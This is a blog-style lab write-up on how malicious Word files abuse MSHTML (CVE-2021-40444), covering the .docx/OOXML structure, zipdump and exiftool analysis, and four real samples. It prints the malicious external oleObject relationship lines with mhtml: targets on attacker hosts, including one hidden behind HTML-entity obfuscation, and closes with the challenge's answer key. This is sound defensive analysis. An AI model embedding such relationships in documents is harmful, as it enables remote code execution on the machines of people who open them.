MSHTML & OOXML (.docx) Analysis

Uncover how attackers exploit .docx files using MSHTML components like mhtml. Learn to analyze .docx structures exposing malicious metadata and payloads.

Hey guys, it’s been a minute since I wrote something (busy adult & work life … lol 😅). Anyway, ever wondered how a simple Word document can hide dangerous cyber threats? 🤔 In this blog, I’m discussing my latest research into .docx files and MSHTML exploits, inspired by the LetsDefend MSHTML Challenge. Credits to the creator, Bohan Zhang, a Threat Intelligence Analyst. We’ll dive into the sneaky ways attackers exploit .docx files using MSHTML components like mhtml: strings, unpack OOXML structures with tools like zipdump.py, and hunt for malicious metadata and payloads. This one’s a bit technical, so grab your coffee and let’s get started! ☕💻

Huge shoutout to my buddy d3xt3r for the research support and motivation.

Check out my other blogs for more tips on investigating malicious documents:

Brief

We’re tasked with analyzing four malicious document samples from MalwareBazaar suspected of exploiting a specific vulnerability. The lab involves hunting for suspicious domains and IP addresses.

To download the samples, use one of these hashsums:

md5sum *
45e7d6562bfddb816d45649dd667abde  Employee_W2_Form.docx
d5742309ba8146be9eab4396fde77e4e  Employees_Contact_Audit_Oct_2021.docx
41dacae2a33ee717abcc8011b705f2cb  Work_From_Home_Survey.doc
55998cb43459159a5ed4511f00ff3fc8  income_tax_and_benefit_return_2021.docx
➜   sha256sum *
679bbe0c50754853978a3a583505ebb99bce720cf26a6aaf8be06cd879701ff1  Employee_W2_Form.docx
ed2b9e22aef3e545814519151528b2d11a5e73d1b2119c067e672b653ab6855a  Employees_Contact_Audit_Oct_2021.docx
84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69  Work_From_Home_Survey.doc
d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745  income_tax_and_benefit_return_2021.docx
➜   sha1sum *
00087e46ec0ef6225de59868fd016bd9dd77fa3c  Employee_W2_Form.docx
8aaa79ee4a81d02e1023a03aee62a47162a9ff04  Employees_Contact_Audit_Oct_2021.docx
4b35d14a2eab2b3a7e0b40b71955cdd36e06b4b9  Work_From_Home_Survey.doc
9bec2182cc5b41fe8783bb7ab6e577bac5c19f04  income_tax_and_benefit_return_2021.docx

Remember to deal with suspicious files in a sandbox environment.

Let’s start by understanding what DOC and DOCX files are.

What is a DOC & DOCX File?

Simply put:

  • A DOCX file is the default document format for Microsoft Word, introduced with Word 2007 as an upgrade to the older DOC format. It’s part of the Office Open XML (OOXML) standard, which uses XML (Extensible Markup Language) to store document content, styles, and other elements. The XML parts are packaged in a ZIP archive, which also keeps file sizes small.
  • A DOC file is the older Microsoft Word document format, used by versions of Word before 2007. DOC files are stored in the OLE2 Compound File Binary (CFB) format (BIFF, which is sometimes mentioned here, is the legacy Excel format). In a DOC file, data is organized as a collection of records and structures arranged in binary streams.

In terms of magic bytes, a docx file starts with 50 4B 03 04

image

A doc file, on the other hand, typically starts with D0 CF 11 E0 A1 B1 1A E1

image
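
The magic-byte check above can be sketched in a few lines of Python. This is only an illustration: the names sniff_container and sniff_file are mine, and a ZIP signature only tells you the file is a ZIP container, not that it is a well-formed .docx.

```python
ZIP_MAGIC = bytes.fromhex("504B0304")           # "PK\x03\x04": ZIP container, used by OOXML
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE2 compound file, used by legacy .doc


def sniff_container(header):
    """Classify a file by its first bytes, ignoring the file extension."""
    if header.startswith(ZIP_MAGIC):
        return "zip"
    if header.startswith(OLE2_MAGIC):
        return "ole2"
    return "unknown"


def sniff_file(path):
    """Read the first 8 bytes of a file and classify them."""
    with open(path, "rb") as handle:
        return sniff_container(handle.read(8))
```

Checking the header instead of trusting the extension is handy because nothing stops someone from renaming a file.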

Difference between DOC and DOCX

I did a small general comparison for both files:

| Characteristics | DOC | DOCX |
| --- | --- | --- |
| Compatibility | Compatible with older versions of Microsoft Word | Compatible with modern versions of Microsoft Word |
| File Extension | .doc | .docx |
| File Size | Larger file size due to binary structure | Smaller file size due to better compression and XML format |
| File Structure | Binary format, not human-readable | XML-based format, human-readable and machine-readable |
| Conversion | Can be converted to DOCX and other formats | Can be converted to other formats and vice versa |
| Standardization | No standardized format | Based on the ISO/IEC 29500 standard (Office Open XML) |

LAB

To better understand the OOXML structure of .docx files, I created a demo file from scratch called Lab.docx using Microsoft Word, with dummy text. (I plan to experiment with Google Docs or Calibre to compare their .docx structures in a future post.) Let’s dive into analyzing Lab.docx to uncover its components and threat potential.

image

Since a .docx file is essentially a ZIP archive, you can unzip it using tools like unzip or 7zip to reveal its contents for analysis, as demonstrated below.

image image

Tools

For folks who love using Linux or web applications for analysis, I’ll also be sharing some tools and tricks to use. The DidierStevensSuite by Didier Stevens offers a great collection of scripts for analysis. In this blog, we’ll mostly be using the following tools:

My go-to online analyzer for quick analysis is IRIS-H Digital Forensics (definitely check it out).

Basic Analysis

Continuing with our basic analysis, a document’s EXIF data is critical for a researcher, as it can reveal metadata like author, creation date, and application version. This helps with:

  • Linking the document to a campaign.
  • Spotting inconsistencies in document timestamps.
  • Discovering potentially embedded data.

In the structure of a .docx file, this metadata info is usually stored in two files called docProps/core.xml and docProps/app.xml

To check the details, simply run the exiftool command alongside the file in question.

➜  exiftool Lab.docx
ExifTool Version Number         : 13.25
File Name                       : Lab.docx
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2025:06:05 12:44:12+00:00
File Access Date/Time           : 2025:06:05 12:44:21+00:00
File Inode Change Date/Time     : 2025:06:05 12:44:12+00:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x576f9132
Zip Compressed Size             : 358
Zip Uncompressed Size           : 1445
Zip File Name                   : [Content_Types].xml
Title                           :
Subject                         :
Creator                         : Test Author
Keywords                        :
Description                     :
Last Modified By                : Test Author
Revision Number                 : 2
Create Date                     : 2025:06:05 12:36:00Z
Modify Date                     : 2025:06:05 12:41:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 1
Words                           : 23
Characters                      : 134
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 1
Paragraphs                      : 1
Scale Crop                      : No
Company                         :
Links Up To Date                : No
Characters With Spaces          : 156
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000

As a researcher, details such as Creator, Create Date, Application, Modify Date, Pages, Words, and Characters would matter to me, but I’ll explain this more later in the blog.
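
If exiftool isn’t at hand, the same fields can be read straight from docProps/core.xml and docProps/app.xml. Below is a rough sketch using only the Python standard library; read_doc_props is a name I made up, and since the standard XML parser is not hardened against hostile input, treat this as something to run inside your sandbox only.

```python
import zipfile
import xml.etree.ElementTree as ET


def read_doc_props(docx):
    """Return {part_name: {tag: text}} for the two docProps parts, if present."""
    props = {}
    with zipfile.ZipFile(docx) as archive:
        names = set(archive.namelist())
        for part in ("docProps/core.xml", "docProps/app.xml"):
            if part not in names:
                continue
            root = ET.fromstring(archive.read(part))
            fields = {}
            for element in root.iter():
                # Strip the "{namespace}" prefix ElementTree puts on tag names.
                tag = element.tag.rsplit("}", 1)[-1]
                if element is not root and element.text and element.text.strip():
                    fields[tag] = element.text.strip()
            props[part] = fields
    return props
```

For Lab.docx, read_doc_props("Lab.docx")["docProps/core.xml"] should contain keys such as creator and lastModifiedBy, which exiftool displays as Creator and Last Modified By.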

Docx Structure

Next, we can use a tool like zipdump to list a ZIP file’s contents, as shown:

➜  python3 zipdump.py Lab.docx

Index Filename                     Encrypted Timestamp
    1 [Content_Types].xml                  0 1980-01-01 00:00:00
    2 _rels/.rels                          0 1980-01-01 00:00:00
    3 word/document.xml                    0 1980-01-01 00:00:00
    4 word/_rels/document.xml.rels         0 1980-01-01 00:00:00
    5 word/theme/theme1.xml                0 1980-01-01 00:00:00
    6 word/settings.xml                    0 1980-01-01 00:00:00
    7 word/numbering.xml                   0 1980-01-01 00:00:00
    8 word/styles.xml                      0 1980-01-01 00:00:00
    9 word/webSettings.xml                 0 1980-01-01 00:00:00
   10 word/fontTable.xml                   0 1980-01-01 00:00:00
   11 docProps/core.xml                    0 1980-01-01 00:00:00
   12 docProps/app.xml                     0 1980-01-01 00:00:00

Note that each Filename has a different Index number. You’ll use that index to select a specific file later on.
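
For comparison, a similar listing can be produced with Python’s built-in zipfile module. This is a small sketch rather than a zipdump replacement: list_parts is a hypothetical helper, and I’m assuming that numbering the entries from 1 in archive order lines up with zipdump’s Index column for well-formed archives.

```python
import zipfile


def list_parts(docx):
    """Return (index, filename, size, timestamp) rows, numbered from 1."""
    rows = []
    with zipfile.ZipFile(docx) as archive:
        for index, info in enumerate(archive.infolist(), start=1):
            # date_time is a (year, month, day, hour, minute, second) tuple.
            timestamp = "%04d-%02d-%02d %02d:%02d:%02d" % info.date_time
            rows.append((index, info.filename, info.file_size, timestamp))
    return rows
```

Calling list_parts("Lab.docx") and printing each row gives you the part names to feed into the rest of your analysis.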

I’ll leave a small cheat sheet here that you can use for further analysis across the blog post

# Examine contents of OOXML file
python3 zipdump.py Lab.docx
or
python3 zipdump.py -i Lab.docx

# Extract file with specific index `3` from a file to STDOUT.
python3 zipdump.py Lab.docx -s 3 -d 

# Extract all files
python3 zipdump.py Lab.docx -D

# Print additional information
python3 zipdump.py Lab.docx -e

Simply explained:

| File | Purpose | Malware/Research Relevance |
| --- | --- | --- |
| [Content_Types].xml | Defines MIME types for all parts in the .docx archive. | Can reveal unexpected file types (e.g., .vbs, .exe) indicating embedded malicious content. |
| _rels/.rels | Links top-level components by defining relationships to document.xml, core.xml, and app.xml. | Malicious relationships may point to external resources (e.g., URLs for C2 servers), remote OLE objects, or scripts. |
| word/document.xml | Main document content (text, paragraphs, tables, references to embedded objects). | Common target for: exploits (e.g., CVE-2017-0199 via linked OLE objects); obfuscated content (hidden text, XML bombs). VBA macro code itself lives in word/vbaProject.bin of macro-enabled files, not in this part. |
| word/_rels/document.xml.rels | Links external resources (images, hyperlinks, embedded objects). | Used to: load malicious payloads from remote URLs; reference embedded exploits (e.g., OLE objects). |
| word/theme/theme1.xml | Defines visual styling (colors, fonts). | Rarely abused, but could conceal suspicious objects in obfuscated themes. |
| word/settings.xml | Document settings (macros, protections, external links, zoom, spell-check). | Critical for: enabling macros (attack vector); disabling security warnings; linking to malicious templates (attachedTemplate). |
| word/numbering.xml | Defines list formatting (bullets, numbering). | Low-risk attack surface. |
| word/styles.xml | Styles (fonts, spacing, hidden text). | Can be used to: hide malicious content (e.g., white text); obfuscate script fragments in style names. |
| word/webSettings.xml | Configures web view or HTML conversion settings. | Rarely malicious, but may contain odd redirects or URLs. |
| word/fontTable.xml | Lists fonts used in the document. | Could reference malicious font files (e.g., CVE-2015-3052 font parsing vulns). |
| docProps/core.xml | Stores core metadata (e.g., author, creation date). | Useful for: attribution (threat actor fingerprints); detecting tampering (e.g., fake timestamps). |
| docProps/app.xml | Stores app-specific metadata (e.g., word count, Word version, page count). | May reveal anomalies (e.g., mismatched word counts due to hidden content or weaponized toolkits like CactusTorch). |

Visual Overview:

  • [Content_Types].xml - Defines the MIME types (content types) of all the parts within the package. It tells the software like Word what kind of data each file contains (e.g., XML, images, etc.).

image

  • _rels/.rels - Contains the root relationships of the document. It points to the key components of the document, such as the main document (word/document.xml) and metadata files (docProps/core.xml and docProps/app.xml).

image

  • word/document.xml - The main file containing the actual content of the document (text, paragraphs, tables, etc.), stored in a structured XML format. For example the dummy text I had in the document earlier

image

  • word/_rels/document.xml.rels - Contains relationships for resources referenced in document.xml, such as hyperlinks, images, styles, or external files.

image

  • word/theme/theme1.xml - Defines the color scheme, fonts, and other visual theme elements used in the document.

image

  • word/settings.xml - Stores document-level settings, such as proofing options, zoom level, compatibility settings, and other Word-specific configurations.

image image

  • word/numbering.xml - Defines the numbering (bullets and numbering) styles used in lists throughout the document.

image

  • word/styles.xml - Defines the paragraph, character, and table styles used in the document.

image

  • word/webSettings.xml - Stores settings specific to how the document should behave when opened in a web browser or saved as a webpage.

image

image

  • word/fontTable.xml - Lists all the fonts used in the document, including fallback fonts if the primary font is not available.

image

  • docProps/core.xml - Contains core document properties (metadata) such as title, author, creation/modification dates, and keywords.

image

  • docProps/app.xml - Contains application-specific metadata, such as word count, page count, and other statistics.

image
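
Since [Content_Types].xml declares what kinds of parts the package contains, it makes a cheap first triage check. Here is a hedged sketch that lists the declared default extensions falling outside a small allow-list. Both the allow-list and the function name unusual_content_types are my own assumptions, so tune them against documents you know to be clean.

```python
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"

# Assumption: a rough allow-list for a plain Word-generated .docx; adjust for your corpus.
COMMON_EXTENSIONS = {"xml", "rels", "png", "jpeg", "jpg", "gif", "emf", "wmf"}


def unusual_content_types(docx):
    """Return (extension, content_type) pairs from <Default> entries outside the allow-list."""
    with zipfile.ZipFile(docx) as archive:
        root = ET.fromstring(archive.read("[Content_Types].xml"))
    findings = []
    for default in root.iter(CT_NS + "Default"):
        extension = default.get("Extension", "").lower()
        if extension not in COMMON_EXTENSIONS:
            findings.append((extension, default.get("ContentType", "")))
    return findings
```

An empty result doesn’t mean the file is clean. It only means nothing unusual was declared here, so the relationship files still deserve a look.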

Analysis Samples

Now that we have a solid understanding of the structure of a docx file, we can start analyzing the suspicious files. Using tools like zipdump.py, we can dump their file contents using the following syntax:

python3 zipdump.py Work_From_Home_Survey.doc
python3 zipdump.py Employee_W2_Form.docx
python3 zipdump.py Employees_Contact_Audit_Oct_2021.docx
python3 zipdump.py income_tax_and_benefit_return_2021.docx

  • Employees_Contact_Audit_Oct_2021.docx

image

  • Employee_W2_Form.docx

image

  • Work_From_Home_Survey.doc

image

  • income_tax_and_benefit_return_2021.docx

image

I noticed something interesting that all four samples have in common in word/_rels/document.xml.rels.

After spending some time on Employee_W2_Form.docx and going through most of its files individually, Index 13 (word/_rels/document.xml.rels) piqued my interest.

I noted an interesting string:

image

MSHTML

Earlier we talked about a file called word/_rels/document.xml.rels that maps connections between document components and external resources, like links, images, or templates. This file uses XML to define relationships, specifying how parts of the document interact with internal or external content. Now, attackers exploit this structure to embed harmful payloads, often leveraging Microsoft’s MSHTML engine (used for rendering HTML in Internet Explorer) to execute remote code or deliver malware.

document.xml.rels can be exploited in various ways, such as:

  • Remote Template Injection
  • Embedding Malicious HTML via MSHTML (e.g., CVE-2021-40444)
  • Follina Exploit (CVE-2022-30190)
  • NoRelationship Attack

Malicious files exploiting MSHTML often involve:

  • HTML Files: Typically hosted remotely and referenced in document.xml.rels, these files use JavaScript or ActiveX to exploit MSHTML flaws, executing code or downloading payloads like DLLs or executables.
  • Cabinet (.cab) Files: These have been used in attacks like CVE-2021-40444, where the HTML page referenced in document.xml.rels fetches a .cab file containing a malicious DLL. The DLL is then executed as a result of MSHTML’s processing of the .cab file.
  • RTF and MHTML Files: Documents can reference RTF or MHTML files that trigger exploits when rendered. A related example is CVE-2017-8759, which is a .NET Framework flaw rather than an MSHTML one and was exploited through RTF documents.

Nicolas Krassas (@Dinosn) tweeted a clear PoC for CVE-2021-40444 around Sep 10, 2021 (it no longer exists).

Analysis Continuation …

Back to Employee_W2_Form.docx, where Index 13 (word/_rels/document.xml.rels) piqued my interest. I noted this interesting string:

<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" TargetMode="External"/>

image

At a high level:

When the .docx file is opened, Word processes the document.xml.rels file and encounters this relationship. The oleObject relationship triggers MSHTML to fetch and render the MHTML file at arsenal.30cm.tw:1212/word.html. The MHTML file may contain JavaScript, ActiveX controls, or a reference to another payload (e.g., a .cab file or DLL), exploiting an MSHTML vulnerability to execute code.
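
To hunt for this kind of relationship without opening each part by hand, you can walk every .rels file in the archive and keep only the entries marked as external. The sketch below uses just the standard library; external_relationships is a name I picked for illustration, and as with any parsing of untrusted XML it belongs in the sandbox.

```python
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(docx):
    """Return (part, id, type_suffix, target) for every TargetMode="External" relationship."""
    hits = []
    with zipfile.ZipFile(docx) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                # The XML parser has already decoded any &#...; character references here.
                if rel.get("TargetMode", "").lower() == "external":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel.get("Id"), rel_type, rel.get("Target")))
    return hits
```

Ordinary hyperlinks are external relationships too, so expect some noise. An oleObject type combined with an mhtml: target is the combination worth a closer look in these samples.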

If you care about the tiny details, let’s break it down:

  • Id="rId6" - unique identifier assigned to this relationship within the document.
  • Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" - The Type attribute specifies the type of relationship, in this case, an oleObject. This indicates that the relationship points to an Object Linking and Embedding (OLE) object, which can be an embedded file, external resource, or ActiveX control.
  • Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" - The Target attribute specifies the location of the resource being referenced. Here, it points to an external resource using the mhtml protocol, which is associated with MHTML (MIME HTML), a format that combines HTML and its resources into a single file.
    • The URL arsenal.30cm.tw:1212/word.html suggests a remote server (arsenal.30cm.tw) on a non-standard port 1212, hosting a file named word.html.
    • The !x-usc:arsenal.30cm.tw:1212/word.html part is an MHTML-specific syntax, indicating a specific resource within the MHTML archive. The x-usc directive is a Microsoft-specific directive used in MHTML to reference resources within an .mht file or external URLs.
  • TargetMode="External" - indicates that the resource is external to the document (i.e., not embedded within the .docx file). Technically this means that the document will attempt to fetch the resource from the specified URL when opened, potentially triggering malicious behavior.
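
The breakdown above maps nicely onto a few lines of Python for pulling the host and port out of an mhtml: target. Treat this as a sketch: parse_mhtml_target is a hypothetical helper, and it only handles the mhtml:&lt;url&gt;!x-usc:&lt;url&gt; shape seen in these samples.

```python
from urllib.parse import urlsplit


def parse_mhtml_target(target):
    """Split an 'mhtml:<url>!x-usc:<url>' target into its URL, host and port."""
    if not target.lower().startswith("mhtml:"):
        return None
    # The part between "mhtml:" and the first "!" is the first URL in the target.
    url = target[len("mhtml:"):].split("!", 1)[0]
    # urlsplit only recognises the host when a scheme or "//" is present,
    # so prepend "//" for scheme-less targets like "arsenal.30cm.tw:1212/word.html".
    parts = urlsplit(url if "://" in url else "//" + url)
    return {"url": url, "host": parts.hostname, "port": parts.port}
```

For the Employee_W2_Form.docx target this returns the host arsenal.30cm.tw and port 1212. When the URL carries no explicit port, port is None.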

Now that we understand that, let’s pull the mhtml targets from the rest of the documents.

Employees_Contact_Audit_Oct_2021.docx

mhtml:http://175.24.190.249/note.html!x-usc:http://175.24.190.249/note.html

image

income_tax_and_benefit_return_2021.docx

mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html

image

Work_From_Home_Survey.doc

Things got a little interesting when analyzing Work_From_Home_Survey.doc.

image

I spotted this obfuscated relationship, with its attribute values written as HTML character entities:

Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/&#x6f;&#x6c;&#x65;&#x4f;&#x62;&#x6a;&#x65;&#x63;&#x74;" Target="&#109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#114;&#101;&#110;&#100;&#112;&#97;&#114;&#108;&#121;&#101;&#46;&#99;&#111;&#109;&#47;&#119;&#105;&#107;&#105;&#48;&#53;&#48;&#57;&#46;&#104;&#116;&#109;&#108;&#33;&#120;&#45;&#117;&#115;&#99;&#58;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#114;&#101;&#110;&#100;&#112;&#97;&#114;&#108;&#121;&#101;&#46;&#99;&#111;&#109;&#47;&#119;&#105;&#107;&#105;&#48;&#53;&#48;&#57;&#46;&#104;&#116;&#109;&#108;" TargetMode="&#x45;&#x78;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;"/>

Running it through CyberChef’s From HTML Entity recipe reveals the plain-text relationship:

image

Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://trendparlye.com/wiki0509.html!x-usc:http://trendparlye.com/wiki0509.html" TargetMode="External"
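
If you’d rather stay in the terminal, Python’s built-in html module does the same decoding offline. A minimal sketch follows; decode_entities is just a thin wrapper name of my own, and the two inputs are short fragments copied from the obfuscated relationship above.

```python
import html


def decode_entities(text):
    """Decode decimal (&#109;) and hex (&#x6f;) character references."""
    return html.unescape(text)


# Hex-encoded fragment from the Type attribute.
print(decode_entities("&#x6f;&#x6c;&#x65;&#x4f;&#x62;&#x6a;&#x65;&#x63;&#x74;"))  # oleObject
# Decimal-encoded prefix from the Target attribute.
print(decode_entities("&#109;&#104;&#116;&#109;&#108;&#58;"))  # mhtml:
```

Character references like these are ordinary XML, so any XML parser decodes them too. The obfuscation mostly gets in the way of naive string searches for mhtml or oleObject on the raw file.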

TO BE CONTINUED …

Questions

Examining the Employees_Contact_Audit_Oct_2021.docx file, what is the malicious IP in the docx file?

175.24.190.249

Examining the Employee_W2_Form.docx file, what is the malicious domain in the docx file?

arsenal.30cm.tw

Examining the Work_From_Home_Survey.doc file, what is the malicious domain in the doc file?

trendparlye.com

Examining the income_tax_and_benefit_return_2021.docx file, what is the malicious domain in the docx file?

hidusi.com

Which vulnerability do the above files exploit?

CVE-2021-40444

This post is licensed under CC BY 4.0 by the author.